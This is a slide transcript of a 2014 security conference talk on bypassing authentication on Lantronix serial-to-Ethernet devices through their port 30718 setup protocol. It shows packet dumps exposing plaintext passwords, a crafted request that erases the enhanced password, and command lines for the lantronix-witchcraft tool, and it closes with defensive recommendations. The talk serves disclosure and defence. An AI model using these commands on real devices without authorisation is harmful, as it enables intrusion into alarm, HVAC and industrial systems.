Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 

Getting access to Lantronix devices: exploring treasures of 77FEh at Confidence 2014

  • 1. 1 Mos Eisley Lab Confidence 2014 Exploring treasures of 77FEh Getting access to Lantronix devices Vlatko Kosturjak, Diverto @k0st
  • 2. 2 Mos Eisley Lab Who are you!?!!?? ● Security Jedi at Diverto – Bringing balance to the force ● Experience – Offensive (Penetration tester) – Defensive (Developer/System Administrator/...) – Have code in: Nmap, Metasploit, OpenVAS, … – Author of free software: https://github.com/kost/ ● If you trust in certificates – CISSP, C|EH, CISA, CISM, CRISC, MBCI, ...
  • 3. 3 Mos Eisley Lab Agenda ● Introduction - Lantronix ● Physical access ● WTF is 77FEh? ● Vulnerabilities & Exploitation ● Recommendations ● Questions and answers 45 minutes
  • 5. 5 Mos Eisley Lab You can find them as integral part of ● Alarms ● HVACs ● Pool monitoring systems ● Sprinkler controllers ● Hacked vacuum cleaners - Roombas ● Embedded systems ● Industrial systems Source: http://ir.lantronix.com/phoenix.zhtml?c=122202&p=irol-newsA
  • 6. 6 Mos Eisley Lab What they are running actually? ● OS – CoBos (mostly) – Evolution OS/Linux – ThreadX – Linux ● Support – 1 or more serial ports – Modbus (few models) – 10/100 Ethernet
  • 7. 7 Mos Eisley Lab Physical access ● Like usual – Game over ● Serial access – No password by design ● Requirements – Standard TTL cable – BusPirate – ...
  • 8. 8 Mos Eisley Lab Connecting to serial port... ● 9600 bps 8/N/1 ● Flow control: None
  • 9. 9 Mos Eisley Lab Most frequent services Available – TCP/IP ● Web (tcp/80) ● Telnet (tcp/9999) ● 77FEh (tcp-udp/30718) ● SNMP (udp/161) Telnet administration interface What is this? Mostly information disclosures Simple web server Serving applet JAR which talks to 30718 port
  • 10. 10 Mos Eisley Lab Device Discovery ● Ask :) ● Look if you have physical access ● Passive ● Active/Scanning – Standard port scanning is fine with conservative timing – Broadcast UDP to specific Lantronix ports (30718) ● Beware – Version scanning(-sV) or running vulnerability scanners may misconfigure device –
  • 11. 11 Mos Eisley Lab Telnet administration $ telnet 192.168.1.101 9999 Trying 192.168.1.101... Connected to 192.168.1.101. Escape character is '^]'. MAC address DEADDEADDEAD Software version V5.8.8.3 (050801) XPTEXE AES library version 1.8.2.1 Password :
  • 12. 12 Mos Eisley Lab So, WTF is 77FEh finally? ● 0x77FE = 30718 (10) ● TCP/UDP protocol for device setup – Proprietary protocol – Used by DeviceInstaller (proprietary software from Lantronix) ● Designed for – Setup of device – Administration of device – Getting device info – Insecurity (sorry, had to write it, you'll see later ;) )
  • 13. 13 Mos Eisley Lab Sample 77FEh communication [v] Sending 4 bytes: 0x00000000 (00000) 000000f6 .... [v] Received 30 bytes: (00000) 000000f7 00108005 58324400 df0e0000 ........X2D..... (00016) 62a7d944 00000000 00204a91 84fb b..D..... J... ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -Q <ip> Query setup request (4) Query setup response (4) MAC address of the device (6) Device type
  • 14. 14 Mos Eisley Lab Interesting request – #1 ● [v] Sending 4 bytes: ● 0x00000000 (00000) 000000f8 .... ● ● [v] Received 124 bytes: ● 0x00000000 (00000) 000000f9 c0a809c9 00000000 54455354 ............TEST ● 0x00000010 (00016) c0a80905 4c020000 141e141e 0a0a0a0a ....L........... ● 0x00000020 (00032) cc070000 00000000 00000000 00000000 ................ ● 0x00000030 (00048) 00000000 00000000 00000000 00000000 ................ ● 0x00000040 (00064) 00000000 00000000 00000000 00000000 ................ ● 0x00000050 (00080) 00000000 00000000 00000000 00000000 ................ ● 0x00000060 (00096) 00000000 00000000 00000000 00000000 ................ ● 0x00000070 (00112) 00000000 00000000 00000000 ............ Query setup (4) Simple Password In Plaintext (4) ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -P <ip> IPv4 (4)
  • 15. 15 Mos Eisley Lab Previous – work ● Metasploit – Rob Vinson ● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-etherne ● https://github.com/robvinson/metasploit-modules – Metasploit modules for simple passwords by jgor ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lant ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lant ● Tools – Simple C program by jgor ● https://github.com/jgor/lantronix-telnet-pw
  • 16. 16 Mos Eisley Lab But... ● Simple password is not set ● Device still asks for password ● Further digging – Enhanced password in place – You cannot get/reset the enhanced password easily – Length is bigger (4->16) – Challenge!!!
  • 17. 17 Mos Eisley Lab Introduction to enhanced passwords Source: Lantronix documentation Feature/Type Simple Password Enhanced Password Length 4 16 Visible in query setup yes no
  • 19. 19 Mos Eisley Lab Interesting request - #2 [v] Sending 4 bytes: 0x00000000 (00000) 000000f4 .... [v] Received 32 bytes: 0x00000000 (00000) 000000f5 09040000 00000000 54455354 ............TEST 0x00000010 (00016) 352e382e 382e3300 00000000 00000000 5.8.8.3......... 0x00000020 (00032) ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -C <ip> Simple Password In Plaintext (4) Query ext version Request (4) Version (6)
  • 20. 20 Mos Eisley Lab Interesting request #3 ● Request to query configuration – 000000eX ● Response to query configuration – 000000bX + followed by 126 bytes of setup – ● X=number of setup records (0 – F): – 0 basic setup record ● Simple password, IP... – 1 security record ● Enhanced password, AES key, SNMP... – 2 specific products / situations – 3 OEMs – ... Wrong! Request for security record 1 provides just zero bytes! HALF
  • 21. 21 Mos Eisley Lab Interesting request #4 ● Request to change configuration – 000000cX + followed by 126 bytes of setup ● Response to change configuration – 000000bX – ● X=number of setup records (0 – F): – 0 basic setup record – 1 security record – 2 specific products / situations – 3 OEMs
  • 22. 22 Mos Eisley Lab Setting setup record 1 for security [v] Sending 130 bytes: 0x00000000 (00000) 000000c1 00000000 00000000 00000000 ................ 0x00000010 (00016) 00000000 00000000 00000000 00000000 ................ 0x00000020 (00032) 00000000 00007075 626c6963 00000000 ......public.... 0x00000030 (00048) 00000000 00000000 00000000 00000000 ................ 0x00000040 (00064) 00000000 00000000 00000000 00000000 ................ 0x00000050 (00080) 00000000 00000000 00000000 00000000 ................ 0x00000060 (00096) 00000000 00000000 00000000 00000000 ................ 0x00000070 (00112) 00000000 00000000 00000000 00000000 ................ 0x00000080 (00128) 0000 .. [v] Received 4 bytes: 0x00000000 (00000) 000000b1 .... ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -E <ip> Setting Setup record 1 Was successful Set Setup record 1 (security) request SNMP Community String (13) Enhanced Password (16)
  • 23. 23 Mos Eisley Lab Enhanced password gone no password to enter! $ telnet 192.168.1.101 9999 Trying 192.168.1.101... Connected to 192.168.1.101. Escape character is '^]'. MAC address DEADDEADDEAD Software version V5.8.8.3 (050801) XPTEXE AES library version 1.8.2.1 Press Enter for Setup Mode
  • 24. 24 Mos Eisley Lab Authentication Algorithm Guess Authenticate Enhanced Password Simple Password Enhanced Not set Ask for enhanced Ask for simple Display setup menu Enhanced set Simple set Simple Not set Password OK
  • 25. 25 Mos Eisley Lab New tool: lantronix-witchcraft ● 77FEh protocol implementation ● 77FEh security related utility ● All the tricks mentioned implemented ● Free software: GPL2 ● Requirement: Perl ● Available at – https://github.com/kost/lantronix-witchcraft
  • 26. 26 Mos Eisley Lab Basic usage: ● Display Mac address: – ./lantronix-witchcraft.pl -Q <ip> ● Display Simple Password (up to 4 characters) – ./lantronix-witchcraft.pl -P <ip> ● Reset Security record (together with enhanced password) – ./lantronix-witchcraft.pl -E <ip> ● Reset Security record without AES (with enhanced password) – ./lantronix-witchcraft.pl -S <ip> ● Dump setup records – ./lantronix-witchcraft.pl -G -D <ip>
  • 27. 27 Mos Eisley Lab Brave enough? ● One command to rule them all ● Display Mac address and simple password, dump setup records, reset security records together with enhanced password: – – ./lantronix-witchcraft.pl -C -Q -P -E -G -D <ip> ●
  • 28. 28 Mos Eisley Lab Still wondering why automatic scanning is bad for Lantronix? ● ● Dump of setup record: 00000030 00 1c 00 03 00 4e 00 53 00 50 00 6c 00 61 00 79 |.....N.S.P.l.a.y| 00000040 00 65 00 72 00 2f 00 39 00 2e 00 30 00 2e 00 30 |.e.r./.9...0...0| 00000050 00 2e 00 32 00 39 00 38 00 30 00 3b 00 20 00 7b |...2.9.8.0.;. .{| 00000060 00 30 00 30 00 30 00 30 00 41 00 41 00 30 00 30 |.0.0.0.0.A.A.0.0| 00000070 00 2d 00 30 00 41 00 30 00 30 00 2d 00 30 02 ff |.-.0.A.0.0.-.0..|
  • 29. 29 Mos Eisley Lab Correct way ● Ask – Someone responsible if they could have something like that ● Send broadcast query packet to 77FEh ● Identify ports 30718 open (TCP or UDP) ● Dump setup records ● Play ;) ● Check if it is still working... – If yes, perfect – If not: huh, but you should restore setup records somehow ;)
  • 30. 30 Mos Eisley Lab It's not about Lantronix... ● ...they warned the vendors about it in their documentation Source: Lantronix documentation
  • 31. 31 Mos Eisley Lab Disclosure Problem ● It's more about vendors who implement Lantronix in their devices ● Whom to report? – Lantronix – I guess they know their protocol ;) – OEMs – hard to find all their customers ;) ● Awareness – Conference – Tools
  • 32. 32 Mos Eisley Lab But maybe it could be done... ● Add white list ● Encryption/SSL? Source: Lantronix documentation
  • 33. 33 Mos Eisley Lab Recommendations ● Have some other device to VPN/SSL tunnel the services ● Telnet only through VPN or other secure channel to administration interface ● Disable 77FEh if not needed ● Filter out 77FEh on network devices to only allowed ones ● Disable other unneccesary services (SNMP, telnet, etc).
  • 35. 35 Mos Eisley Lab Summary ● There are ways to pass beyond authentication (if 77FEh is enabled) – Simple passwords – Enhanced passwords ● Tools – Metasploit Lantronix modules – https://github.com/kost/lantronix-witchcraft ● Recommendations – Disable 77FEh if not needed or Filter out 77FEh on network devices to only allowed ones – Tunnel VPN/SSL all communication to these devices ● Future – There are things to research: way to obtain enhanced password or AES keys for example
  • 36. 36 Mos Eisley Lab Acknowledgements - Thanks ● Previous work (Simple Passwords) – Rob Vinson ● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-etherne ● https://github.com/robvinson/metasploit-modules – Metasploit modules for simple passwords by jgor ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lan ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lan ● https://github.com/jgor/lantronix-telnet-pw ● Colleagues – Dalibor Dosegović, hardware wizard